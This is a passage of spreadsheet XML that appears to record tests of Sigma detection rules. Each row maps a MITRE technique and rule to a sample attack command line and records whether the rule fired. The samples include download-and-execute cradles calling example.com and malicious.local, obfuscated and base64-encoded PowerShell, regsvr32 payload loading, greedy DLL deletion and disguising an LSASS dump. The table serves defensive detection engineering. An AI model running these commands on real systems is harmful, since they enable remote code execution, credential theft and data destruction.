      <c r="F3210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3210" s="43" t="n"/>
      <c r="J3210" s="43" t="n"/>
      <c r="K3210" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3211" ht="15.75" customHeight="1" s="42">
      <c r="A3211" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3211" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3211" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3211" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3211" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wbem\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F3211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3211" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J3211" s="43" t="n"/>
      <c r="K3211" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3212" ht="15.75" customHeight="1" s="42">
      <c r="A3212" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3212" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C3212" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D3212" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E3212" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; del *.dll"</t>
        </is>
      </c>
      <c r="F3212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3212" s="43" t="n"/>
      <c r="J3212" s="43" t="n"/>
      <c r="K3212" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3213" ht="15.75" customHeight="1" s="42">
      <c r="A3213" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C3213" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D3213" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E3213" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "d^e^l C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F3213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3213" s="43" t="n"/>
      <c r="J3213" s="43" t="n"/>
      <c r="K3213" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3214" ht="15.75" customHeight="1" s="42">
      <c r="A3214" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3214" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C3214" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D3214" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E3214" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "d^e^l C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F3214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3214" s="43" t="n"/>
      <c r="J3214" s="43" t="n"/>
      <c r="K3214" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3215" ht="15.75" customHeight="1" s="42">
      <c r="A3215" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C3215" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D3215" s="43" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E3215" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "ping -n 1 127.0.0.1 &amp;&amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak"</t>
        </is>
      </c>
      <c r="F3215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3215" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3215" s="43" t="n"/>
      <c r="K3215" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3216" ht="15.75" customHeight="1" s="42">
      <c r="A3216" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B3216" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C3216" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D3216" s="43" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E3216" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "ping -n 1 127.0.0.1 &amp;&amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak"</t>
        </is>
      </c>
      <c r="F3216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3216" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3216" s="43" t="n"/>
      <c r="K3216" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3217" ht="15.75" customHeight="1" s="42">
      <c r="A3217" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3217" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C3217" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D3217" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E3217" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F3217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3217" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3217" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3217" s="43" t="n"/>
      <c r="K3217" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3218" ht="15.75" customHeight="1" s="42">
      <c r="A3218" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3218" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_redirection_susp_folder</t>
        </is>
      </c>
      <c r="C3218" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect</t>
        </is>
      </c>
      <c r="D3218" s="43" t="inlineStr">
        <is>
          <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892</t>
        </is>
      </c>
      <c r="E3218" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; hostname &gt; output.txt"</t>
        </is>
      </c>
      <c r="F3218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3218" s="43" t="n"/>
      <c r="J3218" s="43" t="n"/>
      <c r="K3218" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3219" ht="15.75" customHeight="1" s="42">
      <c r="A3219" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3219" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_redirection_susp_folder</t>
        </is>
      </c>
      <c r="C3219" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect</t>
        </is>
      </c>
      <c r="D3219" s="43" t="inlineStr">
        <is>
          <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892</t>
        </is>
      </c>
      <c r="E3219" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set p=C:\ProgramData\ &amp;&amp; call echo recon_data &gt; %p%out.txt"</t>
        </is>
      </c>
      <c r="F3219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3219" s="43" t="n"/>
      <c r="J3219" s="43" t="n"/>
      <c r="K3219" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3220" ht="15.75" customHeight="1" s="42">
      <c r="A3220" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3220" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_redirection_susp_folder</t>
        </is>
      </c>
      <c r="C3220" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect</t>
        </is>
      </c>
      <c r="D3220" s="43" t="inlineStr">
        <is>
          <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892</t>
        </is>
      </c>
      <c r="E3220" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "systeminfo &gt;  C:\ProgramData\info.txt"</t>
        </is>
      </c>
      <c r="F3220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3220" s="43" t="n"/>
      <c r="J3220" s="43" t="n"/>
      <c r="K3220" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3221" ht="15.75" customHeight="1" s="42">
      <c r="A3221" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3221" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3221" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3221" s="43" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3221" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "InfDefaultInstall.exe "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.in^f""</t>
        </is>
      </c>
      <c r="F3221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3221" s="43" t="n"/>
      <c r="J3221" s="43" t="n"/>
      <c r="K3221" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3222" ht="15.75" customHeight="1" s="42">
      <c r="A3222" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3222" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C3222" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3222" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E3222" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe -decompile C:\Users	haim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.ch^m""</t>
        </is>
      </c>
      <c r="F3222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3222" s="43" t="n"/>
      <c r="J3222" s="43" t="n"/>
      <c r="K3222" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3223" ht="15.75" customHeight="1" s="42">
      <c r="A3223" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3223" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C3223" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3223" s="43" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E3223" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; regsvr32.exe payload.dll"</t>
        </is>
      </c>
      <c r="F3223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3223" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3223" s="43" t="n"/>
      <c r="K3223" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3224" ht="15.75" customHeight="1" s="42">
      <c r="A3224" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3224" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C3224" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D3224" s="43" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E3224" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\syswow64\regsvr32.exe /s C:""AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll"</t>
        </is>
      </c>
      <c r="F3224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3224" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3224" s="43" t="n"/>
      <c r="K3224" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3225" ht="15.75" customHeight="1" s="42">
      <c r="A3225" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3225" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3225" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3225" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3225" s="43" t="inlineStr">
        <is>
          <t>powershell -nOP -nONi -"ep" bypass -"w" h -C "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3225" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J3225" s="43" t="n"/>
      <c r="K3225" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3226" ht="15.75" customHeight="1" s="42">
      <c r="A3226" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3226" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3226" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3226" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3226" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F3226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3226" s="43" t="n"/>
      <c r="J3226" s="43" t="n"/>
      <c r="K3226" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3227" ht="15.75" customHeight="1" s="42">
      <c r="A3227" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B3227" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3227" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3227" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3227" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3227" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3227" s="43" t="n"/>
      <c r="K3227" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3228" ht="15.75" customHeight="1" s="42">
      <c r="A3228" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B3228" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3228" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3228" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3228" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3228" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3228" s="43" t="n"/>
      <c r="K3228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3229" ht="15.75" customHeight="1" s="42">
      <c r="A3229" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B3229" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3229" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3229" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3229" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3229" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3229" s="43" t="n"/>
      <c r="K3229" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3230" ht="15.75" customHeight="1" s="42">
      <c r="A3230" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B3230" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3230" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3230" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3230" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3230" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3230" s="43" t="n"/>
      <c r="K3230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3231" ht="15.75" customHeight="1" s="42">
      <c r="A3231" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3231" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C3231" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D3231" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E3231" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F3231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3231" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J3231" s="43" t="n"/>
      <c r="K3231" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3232" ht="15.75" customHeight="1" s="42">
      <c r="A3232" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3232" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C3232" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D3232" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E3232" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F3232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3232" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J3232" s="43" t="n"/>
      <c r="K3232" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3233" ht="15.75" customHeight="1" s="42">
      <c r="A3233" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3233" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_commandline_path_traversal_evasion</t>
        </is>
      </c>
      <c r="C3233" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt</t>
        </is>
      </c>
      <c r="D3233" s="43" t="inlineStr">
        <is>
          <t>1327381e-6ab0-4f38-b583-4c1b8346a56b</t>
        </is>
      </c>
      <c r="E3233" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "C:\Windows/../Windows/System32/calc.exe"</t>
        </is>
      </c>
      <c r="F3233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3233" s="43" t="n"/>
      <c r="J3233" s="43" t="n"/>
      <c r="K3233" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3234" ht="15.75" customHeight="1" s="42">
      <c r="A3234" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B3234" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C3234" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D3234" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E3234" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$c1='Invoke-'; $c2='Expression'; $run=$c1+$c2; &amp;$run (.('New-Object') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F3234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3234" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3234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234" s="43" t="n"/>
      <c r="K3234" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3235" ht="15.75" customHeight="1" s="42">
      <c r="A3235" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B3235" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
